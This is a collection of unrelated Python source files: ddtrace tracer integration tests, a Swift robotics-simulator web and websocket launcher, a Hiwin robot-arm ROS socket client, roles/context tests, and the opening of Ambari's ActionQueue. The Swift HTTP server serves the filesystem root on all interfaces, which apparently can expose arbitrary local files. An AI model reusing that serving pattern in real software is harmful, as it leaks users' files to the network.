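# --- Illustrative usage sketch (recipient, subject and body below are made-up examples). ---
# Typically called from a request handler after rendering an HTML template; the mail is handed
# off to a background thread so the request is not blocked by the SMTP round trip.
def example_send():
    body = '<p>Your account has been created.</p>'
    send('user@example.com', 'Welcome', body)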
|
test_integration.py
|
import logging
import os
import subprocess
import sys
import mock
import pytest
import ddtrace
from ddtrace import Tracer
from ddtrace import tracer
from ddtrace.constants import MANUAL_DROP_KEY
from ddtrace.constants import MANUAL_KEEP_KEY
from ddtrace.internal.runtime import container
from ddtrace.internal.writer import AgentWriter
from ddtrace.sampler import DatadogSampler
from ddtrace.sampler import RateSampler
from ddtrace.sampler import SamplingRule
from ddtrace.vendor import six
from tests import AnyFloat
from tests import AnyInt
from tests import AnyStr
from tests import TracerTestCase
from tests import override_global_config
from tests import snapshot
AGENT_VERSION = os.environ.get("AGENT_VERSION")
def test_configure_keeps_api_hostname_and_port():
"""
Ensures that when calling configure without specifying hostname and port,
previous overrides have been kept.
"""
tracer = Tracer()
if AGENT_VERSION == "testagent":
assert tracer.writer.agent_url == "http://localhost:9126"
else:
assert tracer.writer.agent_url == "http://localhost:8126"
tracer.configure(hostname="127.0.0.1", port=8127)
assert tracer.writer.agent_url == "http://127.0.0.1:8127"
tracer.configure(priority_sampling=True)
assert tracer.writer.agent_url == "http://127.0.0.1:8127"
def test_debug_mode():
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
assert b"DEBUG:ddtrace" not in p.stderr.read()
p = subprocess.Popen(
[sys.executable, "-c", "import ddtrace"],
env=dict(DD_TRACE_DEBUG="true"),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
)
p.wait()
assert p.stdout.read() == b""
# Stderr should have some debug lines
assert b"DEBUG:ddtrace" in p.stderr.read()
def test_output(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import ddtrace
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
def test_start_in_thread(tmpdir):
f = tmpdir.join("test.py")
f.write(
"""
import threading
def target():
import ddtrace
t = threading.Thread(target=target)
t.start()
t.join()
""".lstrip()
)
p = subprocess.Popen(
["ddtrace-run", sys.executable, "test.py"],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
cwd=str(tmpdir),
)
p.wait()
assert p.stderr.read() == six.b("")
assert p.stdout.read() == six.b("")
assert p.returncode == 0
@pytest.mark.skipif(AGENT_VERSION != "latest", reason="Agent v5 doesn't support UDS")
def test_single_trace_uds():
t = Tracer()
sockdir = "/tmp/ddagent/trace.sock"
t.configure(uds_path=sockdir)
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_uds_wrong_socket_path():
t = Tracer()
t.configure(uds_path="/tmp/ddagent/nosockethere")
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("client.testing").finish()
t.shutdown()
calls = [
mock.call("failed to send traces to Datadog Agent at %s", "unix:///tmp/ddagent/nosockethere", exc_info=True)
]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent doesn't support this for some reason.")
def test_payload_too_large():
t = Tracer()
# Make sure a flush doesn't happen partway through.
t.configure(writer=AgentWriter(processing_interval=1000))
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(100000):
with t.trace("operation") as s:
s.set_tag(str(i), "b" * 190)
s.set_tag(str(i), "a" * 190)
t.shutdown()
calls = [
mock.call(
"trace buffer (%s traces %db/%db) cannot fit trace of size %db, dropping",
AnyInt(),
AnyInt(),
AnyInt(),
AnyInt(),
)
]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_large_payload():
t = Tracer()
# Traces are approx. 275 bytes.
# 10,000*275 ~ 3MB
with mock.patch("ddtrace.internal.writer.log") as log:
for i in range(10000):
with t.trace("operation"):
pass
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_child_spans():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
spans = []
for i in range(10000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_metrics():
with override_global_config(dict(health_metrics_enabled=True)):
t = Tracer()
statsd_mock = mock.Mock()
t.writer.dogstatsd = statsd_mock
assert t.writer._report_metrics
with mock.patch("ddtrace.internal.writer.log") as log:
for _ in range(5):
spans = []
for i in range(3000):
spans.append(t.trace("op"))
for s in spans:
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
statsd_mock.distribution.assert_has_calls(
[
mock.call("datadog.tracer.buffer.accepted.traces", 5, tags=[]),
mock.call("datadog.tracer.buffer.accepted.spans", 15000, tags=[]),
mock.call("datadog.tracer.http.requests", 1, tags=[]),
mock.call("datadog.tracer.http.sent.bytes", AnyInt()),
],
any_order=True,
)
def test_single_trace_too_large():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("huge"):
for i in range(100000):
with tracer.trace("operation") as s:
s.set_tag("a" * 10, "b" * 10)
t.shutdown()
calls = [mock.call("trace (%db) larger than payload limit (%db), dropping", AnyInt(), AnyInt())]
log.warning.assert_has_calls(calls)
log.error.assert_not_called()
def test_trace_bad_url():
t = Tracer()
t.configure(hostname="bad", port=1111)
with mock.patch("ddtrace.internal.writer.log") as log:
with t.trace("op"):
pass
t.shutdown()
calls = [mock.call("failed to send traces to Datadog Agent at %s", "http://bad:1111", exc_info=True)]
log.error.assert_has_calls(calls)
def test_writer_headers():
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("Datadog-Meta-Tracer-Version") == ddtrace.__version__
assert headers.get("Datadog-Meta-Lang") == "python"
assert headers.get("Content-Type") == "application/msgpack"
assert headers.get("X-Datadog-Trace-Count") == "1"
if container.get_container_info():
assert "Datadog-Container-Id" in headers
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(100):
with t.trace("op"):
pass
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "100"
t = Tracer()
t.writer._put = mock.Mock(wraps=t.writer._put)
for _ in range(10):
with t.trace("op"):
for _ in range(5):
t.trace("child").finish()
t.shutdown()
assert t.writer._put.call_count == 1
_, headers = t.writer._put.call_args[0]
assert headers.get("X-Datadog-Trace-Count") == "10"
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support priority sampling responses.")
def test_priority_sampling_response():
# Send the data once because the agent doesn't respond with them on the
# first payload.
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
# For some reason the agent doesn't start returning the service information
# immediately
import time
time.sleep(5)
t = Tracer()
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
assert "service:my-svc,env:my-env" not in t.writer._priority_sampler._by_service_samplers
t.shutdown()
assert "service:my-svc,env:my-env" in t.writer._priority_sampler._by_service_samplers
def test_bad_endpoint():
t = Tracer()
t.writer._endpoint = "/bad"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.finish()
t.shutdown()
calls = [mock.call("unsupported endpoint '%s': received response %s from Datadog Agent", "/bad", 404)]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="FIXME: Test agent response is different.")
def test_bad_payload():
t = Tracer()
class BadEncoder:
def encode_trace(self, spans):
return []
def join_encoded(self, traces):
return "not msgpack"
t.writer._encoder = BadEncoder()
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("asdf").finish()
t.shutdown()
calls = [
mock.call(
"failed to send traces to Datadog Agent at %s: HTTP error status %s, reason %s",
"http://localhost:8126",
400,
"Bad Request",
)
]
log.error.assert_has_calls(calls)
def test_bad_encoder():
t = Tracer()
class BadEncoder:
def encode_trace(self, spans):
raise Exception()
def join_encoded(self, traces):
pass
t.writer._encoder = BadEncoder()
with mock.patch("ddtrace.internal.writer.log") as log:
t.trace("asdf").finish()
t.shutdown()
calls = [mock.call("failed to encode trace with encoder %r", t.writer._encoder, exc_info=True)]
log.error.assert_has_calls(calls)
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support v0.3")
def test_downgrade():
t = Tracer()
t.writer._downgrade(None, None)
assert t.writer._endpoint == "/v0.3/traces"
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
def test_span_tags():
t = Tracer()
with mock.patch("ddtrace.internal.writer.log") as log:
s = t.trace("operation", service="my-svc")
s.set_tag("env", "my-env")
s.set_metric("number", 123)
s.set_metric("number", 12.0)
s.set_metric("number", "1")
s.finish()
t.shutdown()
log.warning.assert_not_called()
log.error.assert_not_called()
@pytest.mark.skipif(AGENT_VERSION != "testagent", reason="Tests only compatible with a testagent")
class TestTraces(TracerTestCase):
"""
These snapshot tests ensure that trace payloads are being sent as expected.
"""
@snapshot(include_tracer=True)
def test_single_trace_single_span(self, tracer):
s = tracer.trace("operation", service="my-svc")
s.set_tag("k", "v")
# numeric tag
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
s.finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_multiple_traces(self, tracer):
with tracer.trace("operation1", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
with tracer.trace("operation2", service="my-svc") as s:
s.set_tag("k", "v")
s.set_tag("num", 1234)
s.set_metric("float_metric", 12.34)
s.set_metric("int_metric", 4321)
tracer.trace("child").finish()
tracer.shutdown()
@snapshot(include_tracer=True)
def test_filters(self, tracer):
class FilterMutate(object):
def __init__(self, key, value):
self.key = key
self.value = value
def process_trace(self, trace):
for s in trace:
s.set_tag(self.key, self.value)
return trace
tracer.configure(
settings={
"FILTERS": [FilterMutate("boop", "beep")],
}
)
with tracer.trace("root"):
with tracer.trace("child"):
pass
tracer.shutdown()
@snapshot(include_tracer=True)
def test_sampling(self, tracer):
with tracer.trace("trace1"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1.0)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace2"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=0.000001)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace3"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1, rules=[SamplingRule(1.0)])
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace4"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1, rules=[SamplingRule(0)])
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace5"):
with tracer.trace("child"):
pass
sampler = DatadogSampler(default_sample_rate=1)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace6"):
with tracer.trace("child") as span:
span.set_tag(MANUAL_DROP_KEY)
sampler = DatadogSampler(default_sample_rate=1)
tracer.configure(sampler=sampler, writer=tracer.writer)
with tracer.trace("trace7"):
with tracer.trace("child") as span:
span.set_tag(MANUAL_KEEP_KEY)
sampler = RateSampler(0.0000000001)
tracer.configure(sampler=sampler, writer=tracer.writer)
# This trace should not appear in the snapshot
with tracer.trace("trace8"):
with tracer.trace("child"):
pass
tracer.shutdown()
@pytest.mark.skipif(AGENT_VERSION == "testagent", reason="Test agent doesn't support empty trace payloads.")
def test_flush_log(caplog):
caplog.set_level(logging.INFO)
writer = AgentWriter()
with mock.patch("ddtrace.internal.writer.log") as log:
writer.write([])
writer.flush_queue(raise_exc=True)
calls = [mock.call(logging.DEBUG, "sent %s in %.5fs", AnyStr(), AnyFloat())]
log.log.assert_has_calls(calls)
|
SwiftRoute.py
|
#!/usr/bin/env python
"""
@author Jesse Haviland
"""
import swift as sw
import websockets
import asyncio
from threading import Thread
import webbrowser as wb
import json
import http.server
import socketserver
from pathlib import Path
import os
from queue import Empty
import numpy as np
import time
import sys
def start_servers(
outq, inq, stop_servers, open_tab=True,
browser=None, dev=False):
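    """
    Launch the Swift helper servers on background daemon threads.

    A SwiftSocket websocket server is always started; unless ``dev`` is True an
    HTTP SwiftServer is started as well and, if ``open_tab`` is set, a browser
    tab pointing at it is opened. The ports picked by the servers are read back
    from ``inq``, and the function waits for the page to connect before
    returning the thread handles.
    """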
# Start our websocket server with a new clean port
socket = Thread(
target=SwiftSocket, args=(outq, inq, stop_servers, ), daemon=True)
socket.start()
socket_port = inq.get()
if not dev:
# Start a http server
server = Thread(
target=SwiftServer,
args=(outq, inq, socket_port, stop_servers, ),
daemon=True)
server.start()
server_port = inq.get()
if open_tab:
if browser is not None:
try:
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
except wb.Error:
print(
'\nCould not open specified browser, '
'using default instead\n')
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
wb.open_new_tab(
'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
else:
server = None
wb.get(browser).open_new_tab(
'http://localhost:'
+ str(3000)
+ '/?'
+ str(socket_port))
try:
inq.get(timeout=10)
except Empty:
print('\nCould not connect to the Swift simulator \n')
raise
return socket, server
class SwiftSocket:
def __init__(self, outq, inq, run):
self.run = run
self.outq = outq
self.inq = inq
self.USERS = set()
self.loop = asyncio.new_event_loop()
asyncio.set_event_loop(self.loop)
started = False
# port = 8080
# start_server = websockets.serve(self.serve, "localhost", port)
# self.loop.run_until_complete(start_server)
port = 53000
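        # Probe ports upwards from 53000 until a free one is found; the chosen
        # port is reported back to the caller through inq below.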
while not started and port < 62000:
try:
start_server = websockets.serve(self.serve, "localhost", port)
self.loop.run_until_complete(start_server)
started = True
except OSError:
port += 1
self.inq.put(port)
self.loop.run_forever()
async def register(self, websocket):
self.USERS.add(websocket)
async def serve(self, websocket, path):
# Initial connection handshake
await(self.register(websocket))
recieved = await websocket.recv()
self.inq.put(recieved)
        # Now on to the send/receive cycle
while self.run():
message = await self.producer()
expected = message[0]
msg = message[1]
await websocket.send(json.dumps(msg))
if expected:
recieved = await websocket.recv()
self.inq.put(recieved)
return
async def producer(self):
data = self.outq.get()
return data
class SwiftServer:
def __init__(
self, outq, inq, socket_port, run,
verbose=False, custom_root=None):
server_port = 52000
self.inq = inq
self.run = run
root_dir = Path(sw.__file__).parent / 'out'
# os.chdir(Path.home())
# os.chdir(Path.home().anchor)
os.chdir(root_dir.anchor)
print(root_dir)
class MyHttpRequestHandler(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
if verbose:
http.server.SimpleHTTPRequestHandler.log_message(
self, format, *args)
else:
pass
def do_POST(self):
print(self)
def do_GET(self):
home = str(Path.home())
if self.path == '/':
self.send_response(301)
self.send_header(
'Location', 'http://localhost:'
+ str(server_port)
+ '/?'
+ str(socket_port))
self.end_headers()
return
if self.path == '/?' + str(socket_port):
self.path = str(root_dir / 'index.html')
elif self.path.endswith('svg') or self.path.endswith('ico'):
self.path = str(root_dir) + str(Path(self.path))
elif self.path.endswith('css') or self.path.endswith('js') \
or self.path.endswith('map'):
self.path = str(root_dir) + str(Path(self.path))
self.path = str(Path(self.path))
# if self.path.lower().startswith(home.lower()):
# self.path = self.path[len(home):]
# elif self.path.lower().startswith(home.lower()[2:]):
# self.path = self.path[len(home)-2:]
self.path = Path(self.path).as_posix()
return http.server.SimpleHTTPRequestHandler.do_GET(self)
Handler = MyHttpRequestHandler
connected = False
while not connected and server_port < 62000:
try:
with socketserver.TCPServer(
("", server_port), Handler) as httpd:
self.inq.put(server_port)
connected = True
# while self.run():
# httpd.handle_request
httpd.serve_forever()
except OSError:
server_port += 1
|
Hiwin_RT605_ArmCommand_Socket_20190627161324.py
|
#!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
# Receive commands from the strategy side and forward them to the control PC over a socket
import socket
## multithreading
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0'  # initial value of the transmitted data
Arm_feedback = 1  # assume the arm is busy
NAME = 'socket_server'
# client_response = 0  # initial reply counter
# point_data_flag = False
# arm_mode_flag = False
# speed_mode_flag = False
Socket_sent_flag = False
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0,36.8,11.35,-90,0,0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
    def __iter__(self):
        """Return the match method once, then stop"""
        yield self.match
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
    def __init__(self, ArmState, SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(False,False)
# def socket_client_arm_state(Arm_state):
# global state_feedback
# rospy.wait_for_service('arm_state')
# try:
# Arm_state_client = rospy.ServiceProxy('arm_state', arm_state)
# state_feedback = Arm_state_client(Arm_state)
# #pos_feedback_times = pos_feedback.response
# return state_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
# ##----------socket sent data flag-------------
# def socket_client_sent_flag(Sent_flag):
# global sent_feedback
# rospy.wait_for_service('sent_flag')
# try:
# Sent_flag_client = rospy.ServiceProxy('sent_flag', sent_flag)
# sent_feedback = Sent_flag_client(Sent_flag)
# #pos_feedback_times = pos_feedback.response
# return sent_feedback
# except rospy.ServiceException as e:
# print ("Service call failed: %s"%e)
##-----------client feedback arm state end----------
##------------server side-------
def point_data(x,y,z,pitch,roll,yaw): ## receive pose data sent from the strategy side
global client_response,point_data_flag
pos.x = x
pos.y = y
pos.z = z
pos.pitch = pitch
pos.roll = roll
pos.yaw = yaw
point_data_flag = True
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ## receive arm mode data sent from the strategy side
global arm_mode_flag
socket_cmd.action = action
socket_cmd.grip = grip
socket_cmd.ra = ra
socket_cmd.setvel = setvel
socket_cmd.setboth = setboth
arm_mode_flag = True
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ## receive arm speed mode data sent from the strategy side
global speed_mode_flag
socket_cmd.Speedmode = speedmode
speed_mode_flag = True
# def Grip_Mode(req): ## receive gripper action data sent from the strategy side
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_server(): ## create the Server node
rospy.init_node(NAME)
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
print ("Ready to connect")
rospy.spin() ## spin one
##------------server side end-------
##----------socket packet transmission--------------##
##---------------send arm commands over the socket-----------------
def Socket_command():
global arm_mode_flag,speed_mode_flag,point_data_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
            #-------set arm speed--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
            #-------set arm delay time--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
            #-------set arm rapid & safe speed mode--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
        socket_cmd.action = 5  ## reset to the initial mode state
        Socket.send(data.encode('utf-8'))  # send the command string over the socket
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket,Arm_feedback,data,Socket_sent_flag
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
        # the arm side reports the arm state
        if str(feedback_str[2]) == '48':  # '0': arm is in the Ready state, ready for the next motion command
            state_feedback.ArmState = False
            # Arm_feedback = 0
            # socket_client_arm_state(Arm_feedback)
            # print("isbusy false")
        if str(feedback_str[2]) == '49':  # '1': arm is busy and cannot execute the next motion command
            pass
            # Arm_feedback = 1
            # socket_client_arm_state(Arm_feedback)
            # print("isbusy true")
        if str(feedback_str[2]) == '54':  # '6': the strategy has finished
            # Arm_feedback = 6
            # socket_client_arm_state(Arm_feedback)
            print("shutdown")
        # check the sent flag
        if str(feedback_str[4]) == '48':  # reply 0, false
            pass
            # Socket_sent_flag = False
            # socket_client_sent_flag(Socket_sent_flag)
        if str(feedback_str[4]) == '49':  # reply 1, true
            pass
            # Socket_sent_flag = True
            # socket_client_sent_flag(Socket_sent_flag)
        ##---------------send arm commands over the socket end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket packet transmission end--------------##
## multithreading
def thread_test():
socket_client()
## multithreading end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
    socket_cmd.action = 5  ## reset to the initial mode state
t = threading.Thread(target=thread_test)
    t.start()  # start the worker thread
socket_server()
t.join()
|
test_context.py
|
from typing import List, Protocol
from roles import RoleType
from roles.context import context, in_context
class Account(Protocol):
balance: float
def withdraw(self, amount: float) -> None:
...
def deposit(self, amount: float) -> None:
...
class PaymentAccount:
def __init__(self, amount):
print("Creating a new account with balance of " + str(amount))
self.balance = amount
def withdraw(self, amount):
print("Withdraw " + str(amount) + " from " + str(self))
self.balance -= amount
def deposit(self, amount):
print("Deposit " + str(amount) + " in " + str(self))
self.balance += amount
class MoneySource(metaclass=RoleType):
def transfer(self: Account, amount):
if self.balance >= amount:
self.withdraw(amount)
context.to_account.receive(amount)
class MoneySink(metaclass=RoleType):
def receive(self: Account, amount):
self.deposit(amount)
class TransferMoney:
def __init__(self, from_account: Account, to_account: Account):
self.from_account = MoneySource(from_account) # type: ignore[call-arg]
self.to_account = MoneySink(to_account) # type: ignore[call-arg]
def transfer_money__with(self, amount):
"""The interaction."""
with context(self):
assert isinstance(self.from_account, PaymentAccount)
self.from_account.transfer(amount)
@in_context
def transfer_money__decorator(self, amount):
"""The interaction."""
assert isinstance(self.from_account, PaymentAccount)
self.from_account.transfer(amount)
def test_context_context_manager_style():
src = PaymentAccount(1000)
dst = PaymentAccount(0)
tm = TransferMoney(src, dst)
tm.transfer_money__with(100)
print(src, src.balance)
assert src.balance == 900
print(dst, dst.balance)
assert dst.balance == 100
def test_context_decorator():
src = PaymentAccount(1000)
dst = PaymentAccount(0)
tm = TransferMoney(src, dst)
tm.transfer_money__decorator(100)
print(src, src.balance)
assert src.balance == 900
print(dst, dst.balance)
assert dst.balance == 100
def test_context_set_values():
class Test:
@in_context
def test(self):
context.foo = 1
assert context.current_context.foo == 1
Test().test()
def test_context_manager_multi_threading():
import threading
class ContextClass:
stack: List[object]
def doit(self):
with context(self):
# Save stack to ensure it's different
context.stack = context.__dict__.get("__stack")
cc1 = ContextClass()
cc2 = ContextClass()
thread = threading.Thread(target=cc2.doit)
thread.start()
cc1.doit()
thread.join()
# ensure both stacks are different objects
assert cc1.stack is not cc2.stack, "%d != %d" % (id(cc1.stack), id(cc2.stack))
def test_context_manager_multi_threading_nesting():
import threading
import time
class ContextClass:
depth: int
def doit(self, level=100):
if level == 0:
context.depth = len(context.__dict__["__stack"])
else:
with context(self):
print((context.__dict__["__stack"]), level)
self.doit(level - 1)
time.sleep(0.001)
cc1 = ContextClass()
cc2 = ContextClass()
thread = threading.Thread(target=cc2.doit)
thread.start()
cc1.doit()
thread.join()
# ensure both stacks are different objects
assert cc1.depth == 100, cc1.depth
assert cc2.depth == 100, cc2.depth
|
main.py
|
#!/bin/python3
import threading
import os
from http_server import run_http_server
if __name__ == "__main__":
PORT = int(os.environ.get('PORT', '8080'))
HTTP_THREAD = threading.Thread(target=run_http_server, args=(PORT,))
HTTP_THREAD.daemon = True
HTTP_THREAD.start()
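    # Block the main thread indefinitely; the daemon HTTP thread keeps serving
    # until the process is terminated.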
threading.Event().wait()
|
ActionQueue.py
|
"""
Licensed to the Apache Software Foundation (ASF) under one
or more contributor license agreements. See the NOTICE file
distributed with this work for additional information
regarding copyright ownership. The ASF licenses this file
to you under the Apache License, Version 2.0 (the
"License"); you may not use this file except in compliance
with the License. You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import Queue
import logging
import threading
import pprint
import os
import ambari_simplejson as json
import time
import signal
from AgentException import AgentException
from ambari_agent.BackgroundCommandExecutionHandle import BackgroundCommandExecutionHandle
from ambari_agent.models.commands import AgentCommand, CommandStatus
from ambari_commons.str_utils import split_on_chunks
logger = logging.getLogger()
installScriptHash = -1
MAX_SYMBOLS_PER_LOG_MESSAGE = 7900
class ActionQueue(threading.Thread):
""" Action Queue for the agent. We pick one command at a time from the queue
and execute it
Note: Action and command terms in this and related classes are used interchangeably
"""
# How many actions can be performed in parallel. Feel free to change
MAX_CONCURRENT_ACTIONS = 5
  # How much time (in seconds) we need to wait for a new incoming execution command before checking the status command queue
EXECUTION_COMMAND_WAIT_TIME = 2
def __init__(self, initializer_module):
super(ActionQueue, self).__init__()
self.commandQueue = Queue.Queue()
self.backgroundCommandQueue = Queue.Queue()
self.commandStatuses = initializer_module.commandStatuses
self.config = initializer_module.config
self.recovery_manager = initializer_module.recovery_manager
self.configTags = {}
self.stop_event = initializer_module.stop_event
self.tmpdir = self.config.get('agent', 'prefix')
self.customServiceOrchestrator = initializer_module.customServiceOrchestrator
self.parallel_execution = self.config.get_parallel_exec_option()
self.taskIdsToCancel = set()
self.cancelEvent = threading.Event()
self.component_status_executor = initializer_module.component_status_executor
if self.parallel_execution == 1:
logger.info("Parallel execution is enabled, will execute agent commands in parallel")
self.lock = threading.Lock()
def put(self, commands):
for command in commands:
if "serviceName" not in command:
command["serviceName"] = "null"
if "clusterId" not in command:
command["clusterId"] = "null"
logger.info("Adding {commandType} for role {role} for service {serviceName} of cluster_id {clusterId} to the queue".format(**command))
if command['commandType'] == AgentCommand.background_execution:
self.backgroundCommandQueue.put(self.create_command_handle(command))
